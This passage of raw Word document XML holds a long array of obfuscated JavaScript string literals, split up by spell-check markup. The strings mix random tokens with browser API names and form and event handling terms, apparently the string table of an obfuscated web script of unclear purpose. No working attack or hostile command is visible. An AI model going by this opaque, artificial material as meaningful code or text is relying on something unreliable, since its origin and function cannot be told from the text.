        <w:t>", "HlLeH_Q2", "Kesnoz3g8k3FpQQ9", "6_c", "pd4LuWvKhxTEpgc", "7iTRE6xxBddfOOOu", "sPVR6SOgknGhgA", "7fg", "fjzya_01MJkRa9X_", "Int32Array", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SBDtRKMSRNNSeOzDxg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hasOwnProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "mL8sh03E4062lCwuK4rfFn3IquGvG4I","1S65F9FBaQ", "vD_2KJkhD8sLZpe-", "cn7sYIQkQsdUE5iavg", "[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]--", "jyPZSaocE_E-UuH_yiNHybI0d0dBz1H6Kpb7kDg4qiM", "KzafEuBXFq4nb-2vhRVR9u8n", "q-QFx0TO", "9PJTujPk", "TiyaKZ0qb-JlGa674g", "EDW9TpxKAeNaAA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setAttribute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "443", "get", "lbECiFqZ3QXQwWIoCte6PTik", "F8Iewk7TszvT60QgEvXPLH0","Z9kj5kTq7xbfiRpXeLajSxOUrPfXLPhzsGArHMS8eb5ZNL3Q0Nvmuno", "GEKcTPV2Ho9uaQ", "7QjtEqwGNPo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toLowerCase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "from-page-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1zC6WOVFM7EXQ5ee", "qTbXbbYySOlDSOfRvA9wheY5UgoyzR7U", "YsECpHeT6g", "r4A06ln17zW-gh9L", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifsoiEQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "oiD5csQFBKo", "WjKUUeRILKY3daLp0CIO4qEOZkpvxEe8Ytes-1Vl71iezicXV3wYHI4upiCN58XFHhS1NB2Ub-u8eraLDtVmdw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GTzSeKY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frameElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HWvxH6k4EOVVSw", "KzO6RvxXZakpNb2_qXx4xP1ceA", "CIJ1mwLd11SxlWsOKQ", "Document", "5sNu5gKywHLo6mYxd9SOOGXv77fTL6wl8A", "CIJPyT6_ow", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>forEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "FCS7RfF2c_kf", "ydBfsSq1g2ropXoiUsSAMFGijceIIuQ4mwcKR43MIelCWcGUwduUinyXAP4oXw0srpEyj_JcnUE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PsQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vvoNn3Lg1w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8Tu-fo9KCZ0JTsqzijB925AvNjxIu0yBStPJiGE2", "URL", "EZI04A7a", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sIhhvwbV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Error", "sFKNAMlIXLlDMLa4mQ", "HKgD1Q793GGJtmISLKmFKwjl98w", "Mt1NqAylvXU", "assign", "S5UH62HIwQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JcoYhgqgzHjzmzM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Hel$&amp;?6%){</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>+#@\uD83D\uDC7A", "OYZu-Cu5qg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ClPgFbEH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ZkT6R70vKd5eTenxyx0237QMeBRjzVPKL7_d-QE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rcsY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PFfNDqAdDrFmb_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Object", "feVuiimeuXe43Q", "G1HsVIQgJ_5A", "\u26CE", "NjvUYKlMOf1vaevY32h07_oGGEhGuWu5c9H07H9MrCLv5iU", "sQKXP4lK", "multipart\x2Fform-data", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getPrototypeOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "document", "U8565RL880jOgEddOf6oEgaBvPqxKowUkGFSNLDuCJY0fJqumYri6iKJCdJ6ADMe8b5c7LQ68BgNmg", "M5Vs2RKP7GSzx0NhF-A", "5RWXS-l3XPcQI5nBkCc", "gdlV1zqIw2Hrq2RmGg", "([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})", "parse", "\uD800\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uDFFF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uAOjLYBIAoMIQcrI2G86ncVXLSEssRvWSfStojN8ylj1s0lREBZ_d7EZ0ljlqPiEYBvLdS_zd6jbF6w", "hi3mMrInQM8gEZ3Y_xw6", "oHjeG64CFOlGY-iN2m9YsOZ-NhEtgDPvJJ_qpzFft16I2jkfRDZSRppKpHHWuIe-Zkvzb0HbFb3nLsHSU55scqF8WCXy770-05o", "iMN0-2eJlBA", "v4Y", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XrRxng_P</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "WAXPAJMFSfY4O-rW1i5b_roj", "Q1fWbbs5AdFnIOjO9iBT464", "WagxmkXM7QK0uFcpbeO1AW-JtNyvHoE38GNTYQ", "n-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NNyWOKkAnFjmck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vMFwySexlg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "_u97pk6Z5A69xENYSZz_GByQ", "8Ps", "k7pD0TKLgSKooTlKSK4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>djinPthydckqFQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "11GBROZIP7FWZ--mgnlas_lsLxIzlCXsOofzoxoHtgDXknNGGTFNXoNY-i6e7t7jYlftaB-EXeu-c8TAV4x1Yf8i", "EEXNTOpUPNB2KPKqhg4S7IQ", "qINh72e5gQ", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"zBiUUeRIXqMbO_C9lGJcrtJ_KVsriTLsO5T_6ggZqg_imxJSDB8KRJUT_HbBsZ-nVFW5dFTKSva2XKSDHd41AfY6Hnqlr_0uzw", "chL6V-8CC-0kCA", "2Vg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PyeY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "filename", "s172fp5sYoRTGQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelectorAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "target", "1FyYFvhKSrpjbPWQlG51pOc0MA0dzw", "Lohr7WKU3zbNhQ", "c4sFvWjxqj-o9m4", "TbZpyw2Q6Higwg", "Srl4wgS9sF61rwUpCOWJ", "form", "ytURqXnvkgDBsC4DYZHl", "htkPxGCOrQPT0RM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vacOlVernTU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "W4VSzTS95Gr79mARQMuJNnTlzaDCCYMZ8lN-BZI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encodeURIComponent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rtts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "537MWbs", "GDKVVed5R44hRZD5", "vvYjoVfk8laC3QQeIaS5EQnX_ZymJsYOjyM", "1usIu2LuzAPK-w", "LUatIPh3K_BU", "number", "3AjkKc4DYcQVBIjU3TZn1o0zTCpFrUWKBA", "O5R-uwyL_WmqrGoSRNzAHmH1ioC-fYU-qw", "PiGYcsdrXus6aaaw", "j6Bp_TmZgXeOkFMcSbjIJ1yWn-zhZMISmTQHasLFRudTQaOj3rOXyQSORpAi", "LXvwO5I5J9NlRQ", "I36hSPAyBw", "VLFQki3izlY", "29Qo13DCyFjLhXI", "Wm35U4gWJcc", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HPhTgESk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uiXFDqUEfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HyyxAoRX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "^[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]--", "RkXLdK82AelmQqzfkzdP56NvWDdV7F_LDJm_jUk", "_nmsY91rOr1cWITR-2pXpw", "76kj3Qbbmn3X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defineProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "0DTUF6ovGPc0WA", "UUCQY-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WeakSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yesA-HPMqSLcnUMRZw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xk-3Y_10H5ZXSJjmpwIp2bEaXRdN6EiT", "HFjiTI01PexDTO7r", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OSzuYLMdDIly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Az31NpkkaPUSFw", "BMM18EM", "GSykGYdgCZwQeq3JngF6j7EI", "IdVonR7LjGvlzBl9WA", "8WfXf6AlEtg", "osAZ7GC4vib25w", "w-0bs23nuC7rtnlHVrHVYzKn1IndZeAyiR5_RaDKa_JpL8WB0rq9zD2WAd4iaRkZlZoOqqlYxhpjrxgZsiq6hDSeqZw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isArray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "WH2JFvZDWJF4feSxiFoguOlqWhUHgCOVa9Pviw", "PolwnhKPqkeYwxFJMLfwUjT5pbfuSY9a6FwiNr-XCYksOLLwp673_ie_ZZhDOWRIzL8c", "dI8YuQ", "pop", "1lyMSetFQLl1IOGviFsNoed2Dhs0mTqhKMeyz2RT6TmUgXhdO0oYSZhuvG7Zt8WlQgL9BVqURY6_OdmCTIl5cYoUVi3wpbx82oeQywXmnjsXgVE9kgAz7iFg6IFoUgld8XMNsl4AZlbThsJhLLLmbXjmpNCahuqZjisaX0wIFw-_sqhJa0G9hR3y1EgRUZqgHhjKQgoRE1H32TcifwOqu6nX8OHgFq8Mb4BQp-TzJHrT-5HxCkt6qF_kBNjQd8RpNXcYOYiiwJMd0T9lkSD6tL9z9meEydCcrx0ha_G82WUc_ogUS9frDWIfnRT9R86GporQiKzTFKn_3VOo2tRdf0QDaOvyf0fCMD7NjeHYRbmNwVMMhCmqZnsi4VuA_9CTv2-x9DEs-zRBay8jaXr1vzThrfuz6RzVteDJzUbMOl75u5xVC-mGYId9B9VOvK_lnZD0CKMukBoBY6esMftV8dEOjNqv14ZnfhsgRVLo9UL30G-Dqa4wzvQBJhpS2ZbB21MOJ14ItFb9PVJ5wrdyBb2Zz8szpcpEqAkd7rRlIme6jdPHZ9JDepWdzZ1nzzZjRDJbsztQcA8Bbl9333XS57UH5P5IE91X1yWalpc9WS4QgcLHSRWRJ6Mn6vV9_Pqwmbt93Y056evLTNpDfRj1h4pqHLwCAjoF6hTNjhfEljnAckqi-1dx8CeGd7O29jaZFuWeNXaxvD6MCEC2GiCQDuBNJulbKEEp5VoP07783B_93jatE1R4nlxHeMWK-fHu3jxBIQQj_ZGsZuXOa5S-9bH7YiehWIBt3rJ9KPCIf4Ic7rA4DkEloh0FpihVcXpSwk8AgO8xB__FpjDZa7QPKwEkORC1CXL4mrmEyZtO6nOrDR1rCb-OUMce2P-IkGN_TAL_Xj-gza9DHek7e_LAk4KYzmGVe-jtHREtdBAqyOBtUYNN3gpeLDLFrU8FwQ_1-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>bA66Rgk8tDM7RCWBCowwVAyYwWymNEKE5pG9SuA_-Ih4W-aCcW7CiEQtxaV4b1JT8lZujC_p776vxCS2bYMrvJHz6yK7nDY9xiLfk6CUwXLvsXLvCyd9eGpAe4iiqFPXYu9mNZTh6K8KtpAPbnALVwt5PLgnnUXDqXZ8uf2wGOYgE8Cg_W29xLp4_uLiNpVrOE5tphcTCpzTL3dPqLlitKkF_0Ix4AasyMOFC1HQEh74S8oNAacuZujreSDP4KnEhK0fEo6kWyVbQT3dwSqmrOdcc93_IbxT_p0LmgFibTHXqVAXy4tyM5JtWrU3ehQjKeyDmsMlyovxUV8HdvMWu5vSKNNQ32UCCrlZaGEoFE7OjTG9Et35ldFcUlVS3AUd4kF1icTCk3vkL_szkPgQbbxs2zqogFWIFzEmytFJtSoEUVaBJwH80eLhwTXe15tnVyLxHa6VQCgLboe1spcaAEZCNXYZherTFJTeNLP-Nw86O4P2LXObZXEOi7TKhq9pulDLa6tECWN8BKmVQZ-VjEy5jTu6ScZC8VkECR6H0o8IiJ0QB1wiri_-d7hRAPysrdGk-UwXdHWedwEm7BnfeolFQR7CxVDonThosTqhEQvwm6XxvEgvWBJUlerVgIWpyo3K8uK3aYPZr6aVmkfHu3YD9R8g4_j9D5avBViQQkNJg51e3pEvG0dx28BLKF5RzGDnIu_W-8bPkIz1UMME68eFDJGhmSQLSGm4w10DVNwfgADLwBa6L9VaYtlgtbvvTTEj-TbYqLCdFuD9Pl9WbHLdlCDYL2e6Jddcup53VCddHqJti9VWTSkoSVPqjTouQb8BmVQOJ4h-BKaTyl9K9uYlAz-CHNAP_REUinjMpTRRAbdnfGxQuEvzDLdefSAf6OjzOOv8SdDDr33k74hbqfGy6GGY9LEHC0uvx8eeG3GY65Wbsrb5xzLVecFANRxD1lcPAshwGcWWo9B-t9zwXjJnOZexxrPzR3Z4tL0Yer6oPG7Ki-GKma-PlvMDUPUt8uw8W1e9aHMwIBkKLbmdf-y4Oi7YczmbdIKRJXr2DGDNEbSQuPkrphOyW5mR9DIVIJCBb8JTt6ny0btpkAa39uyTABQhxFnT6dQgtj3_kAfpPFNpo_H-lERljVtG_kOTCKmB6lROD_wtXgctUru_wEQYhNr8Tw43r_ifky3Sz882iU9y6TAPuuCVf1p56fM0nD-g9ntvv1QQb5w-bUBBQpxOtzBLGbA_a032QLRUaJepBtDD1KP89JYc_N17XFxTGjaD_NeF2uorXGY3CAVvzZb7yVNh3vrc_-ssT7pRfeOtwmzJhHGIrvo5GZ8KoKghefXn2uYJ99jxY68puAZgNQ16pyZhh4cR6a7ghuno6_cC33h7W9b35F__X5QVNum3AvxfdeDT3DoiUyXugJtz6MWlkIeZyAvC0PD5mbUuT50w4Nj3MIiCayK-mFJarsjYxvQVf6oqFsXKj2LdqUjYGYQTEvgcAzhfAhJ_muopeA7G4pn26jFqbAMV5coUy0Rz5f2t4uJcRBFsrlVIIpfv9kgSUYxgNeBrzU8aYXv56rHolCIwz0Kf0nZimohPsMp6CvjPLPq1z4C-kjbhepd40Bvq5wKyPddQAcfYnfXW2y7fXmnohTV90fa1N1vfcqlQ6euUs-OJ2d-Q8qb-vPQSdCRlJSPIg9Wf38dWzBenUOMm5rhhRGHs5RSMYoVxhq02IOaN6mnM_7lWxGMMjpZ7eRg-X4_LMOoOkLrqCbW9yGXdk7SSZ0BVR7BVfXKBclRQzVxtOkfvEjQnO1i9fvSxozWtvkFS054Yt8k_7xvN0BZyvCy6_EP5d8wQN29wc2U6GRD_Wn-rVGIRqmhaegdWrHvWL2w2mDUK_LP4bcZpwezKU0R7-svCNHvDaroEgHSedqdhV2M7z3v33a4OmEKwoWvOHwB4XSsGB_W5Rejd02D9GGLEX6k36cKDV1BfVfG6ImHr0iGc3kbaC-VFIjMPVT3M5CtnyKQpCRje9v-mw1Oi1lxCR6ia29ivq1KwOsDfrbtyhKMZS4IGm1lb9P9uk5rZMBdfakwBsiWDiZoMGdJhtHg9R9WittEcMrn6Zd1HSyYhBCSwtVPT5Iqaaio5c_oVc0xMKmHydDAqsBMmhrgIe3rT5lJ3iUtJDs</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>a-hDBHKkmNU_IDBHf8HutQc2MEbKJhHJyAqyruEHlX_tEx4ZsYgQ7DqW6Vt0EJh770gN32phS_XF3zGciqVfESdomxzJPQUyjcbkODRbOj3ujZrJgfb8BYwMyPS8r0rAs7REEKN_dyqhX8xzpQkHcSn-5ec8WMwYxnQ7RjPFcokahSMs", "86Nj5Ta3s1-X", "cn0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nrtt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-xo", "ZagTqByrx1Lylj8", "j9V_xjqBsEvXwhc", "reduce", "98hJjjKUkhiB_GAaQe4", "FvtZmCmEuEj4_SVKTPE", "kd19yQWE_ECOphEpbJv-TjS8", "A609-Q", "Math", "EcI", "No9grwyC-Hw", "QTqEWP5kLboKVKI", "CBebbM1vVqMWRp0", "Om6mD9N8Nqp3", "01S_F50", "LGXcZ7klEfdxcqfZhBZJ57R8RwZI8FnLEYehmklGnmeqqEETUERzfPhzzVanwJ-3R0uiWX8", "DGHjEqQEN8tMS8nn8zsgna8FO256m1qYMqeBvV9s2k_h9GVrKF9uLNMjtiSmlPfCJCGWQB2-YLrQBP7qGg", "s2DOKqJ2LNpSbLjb6Q", "7yaZQ-dKf64NOOOqjzcU9bw1Pxtp3TL1Jw", "b4kxuRzq4Q", "E7g54Veq", "X0m6B9lWcg", "8CbDWbwGDs0PML2m31oTg9l8ChMUmyv6Tg", "myiqL8NKeI8", "sqVK2VmRngo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LEPSOpMJIutz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "5eQD7FHy7S0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ryDNGaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "abs", "LlapLcJHVJ4", "b5tYwCKY02yp", "-2\u202EYuuMIdcQn\u202D", "kTTwJIsjFM1BQN3SvV8x3ZEzW2VC9g", "children", "NcYMjG_z7Db-zzBMKNI", "function", "zpE_n1Lj-gbapRI", "O2jeQqpFF_gxLaU", "U8MfsWXI8iWXiAM-Q-XLSzE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QFi-NdhjDg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XtdalXyujU_S_WIeIK-LdRz68Y7vTeZ53w", "8CSDbPptaacjeaL2", "haIY4VnkwjqI5AQzBtKFEkfi", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GVyTGg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6TzFK6c6bfctcqq5yEkPrMlzVxBZ-zn_Xcbk2klXu2TNxVlLBgVSUb5J1xP5jM3qQ0r0WC2dBtq1KsHEeqIgHw", "match", "C6Ur43rm3x3Zzlc", "2cB87miNhgI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "E61hywjqlA", "PGDNZ5kZB9x-cd7B3wM", "interactive", "y-5C10uBjhfKlnQ", "qbo51XzQ7g", "min", "-5gc1WfC13uprj5JDbmI", "SapNkz-f726EjWA4HuHZ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setPrototypeOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "any", "bst0jze6qXak", "detail", "sJxGyV-Jrln7xRZrTIk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TGc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ltltkQ-Hv0XJvUtSfw", "ga003CvjqGvbtxhCRfymCGk", "f_cbvHb23A", "PXKyBN04FpxiMM_k2xVm_Lo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XQbKHoYdVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "34teyWz0zAncqDI-R4nPMQ", "-2HzdoQ3Rto", "18h2ggX1hQ", "l3Q", "pEv2LuA", "hidden", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "lc4PomaMvQLRkWl1YabaTQ2V", "Cc9MkDePkCDp-Hsa", "JmGAKOt8HahlOPXc", "51v1cdk4IqtFDcmJvjQ4gLxSfHVt6U6QG9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Y0C4aJ1pDIVwTw", "9wL2cYgyBvghEJOP0W47qP9PKDA", "r-5wg2my_z6q8UkbGa30VDyjoY7DXqo", "CBf9e4QtYdpJVcq8_zEqkdpcM3hi4QjLVLqz90YC5kn48A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dTqqeMg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4mOqd-RPOKtLftSjjn4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dispatchEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "RYx31QOB8Vmn2lZ8AeyeL0ut8LqObLl-xFMEB_X5PQ", "Go0q-wuE2g", "2F6XC-5FRK1xObi9mXVTvf0rJwoGhmavct-1wi1k-HzDzy4Pd1MaLsRU42HJ", "BNVs1Fs", "Mwy8QvpJbbRxHA", "NuJm2w-rznLE2FgOBw", "nNt9yxSC9lLJjlQxL7HlSh_HsuzhTvIy93stYrG_E40", "8SKXD_IcSbFu", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9UxxU_H2GfWxwcjdb3oWzyDz-7bRtQL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XlI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "undefined", "13n0cKc6Rg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "catch", "substring", "zMNB_D-0m2z1", "SQHWQ9YcNtkvUYD20A", "sSWXbu91QvQ", "6jOVSIYxaLI0QoT41Q", "3BmUVo0", "DSzWeIIucOoqQtf66ngjt_hcZHc7", "wgS4aOITMI8", "6CDMVI4J", "mFDRVo87P69HdPflwA", "6xH3fpwrDO8tSd7p1TRY3bw", "round", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"qjHRb7EhCuouLbmemG4I", "1mbfdvRKW95hVcvTgw", "n7cFjhHJ", "bwezb85xX88uNIQ", "aCWAEOE8PKVEZ50", "N12RKORyAJZ8a7w", "Yz_6d58EBuYUMs6H1T5J", "BgPYJ6Y6ZesuEA", "u3bSQL0jY-5bKPit", "A_pC8TPO4Q", "AoYVxSLsgGv5oSEtLtKedXnj-MydDuI8gBIeWNnfWO9tS7HY9q7dkz-Ye8lFHVdg7N8juPJN3Cdg", "Lqxf9AejoG-JszY9Hw", "bubbles", "itNNjzOd5Ejuvi5NB4evcziH88L1D8xi", "xIlL9jjTtXPn-nJD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MrFDizWMug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "set", "3gndOKZWXQ", "nK8S41H1wRrOthsMC-Y", "IDO0B9ljfYUUBqis", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mIBGnSifzGSilXcjSoPZdCOpkoI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegExp</w:t>
